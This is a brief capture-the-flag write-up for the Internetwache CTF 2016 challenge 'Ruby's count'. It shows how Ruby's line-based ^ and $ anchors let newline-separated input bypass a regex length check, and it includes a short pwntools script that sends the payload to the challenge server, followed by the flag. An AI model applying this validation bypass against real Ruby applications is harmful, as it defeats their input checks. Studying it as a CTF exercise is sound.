The force is with those who read the source.

Internetwache CTF 2016: Ruby's count (exp 50)

2016-03-04
writeup
Internetwache CTF/pwn/regex

Description

Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.

Exploit

Let me count the ascii values of 10 characters:
abcdefghij
WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !

So, now we know the matching regular expression. However, we can’t achieve the target score by input only 10 [a-f] characters.

Let me count the ascii values of 10 characters:
ffffffffff
Sum is: 1020
That's not enough (1020 < 1020)

To input more characters, I make use of the feature of Ruby’s regular expression describe in this post.

^ for start-of-string and $ for end-of-string ARE just new lines - \n!

Using following pattern, we can make the sum more than 1020 and get the flag.

exp.pydownload
1
2
3
4
5
from pwnlib.tubes.remote import remote

r = remote('188.166.133.53', 12037)
r.send('aaaaaaaaaa\naaaaaaaaaa\n')
print r.recvall()

Flag: IW{RUBY_R3G3X_F41L}

Blog comments powered by Disqus